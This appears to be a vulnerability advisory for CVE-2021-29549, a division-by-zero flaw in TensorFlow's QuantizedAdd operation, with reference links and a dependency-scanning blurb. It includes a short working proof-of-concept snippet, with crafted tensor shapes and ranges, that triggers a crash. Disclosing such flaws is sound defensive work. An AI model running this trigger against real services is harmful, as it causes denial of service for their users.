CVE-2021-29549: Division by 0 in `QuantizedAdd`
(updated )
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd
:
import tensorflow as tf
x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8)
y = tf.constant([], shape=[2, 0], dtype=tf.quint8)
min_x = tf.constant(10.723421015884028)
max_x = tf.constant(15.19578006631113)
min_y = tf.constant(-5.539003866682977)
max_y = tf.constant(42.18819949559947)
tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
References
- github.com/advisories/GHSA-x83m-p7pv-ch8v
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-477.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-675.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-186.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/744009c9e5cc5d0447f0dc39d055f917e1fd9e16
- github.com/tensorflow/tensorflow/security/advisories/GHSA-x83m-p7pv-ch8v
- nvd.nist.gov/vuln/detail/CVE-2021-29549
Detect and mitigate CVE-2021-29549 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →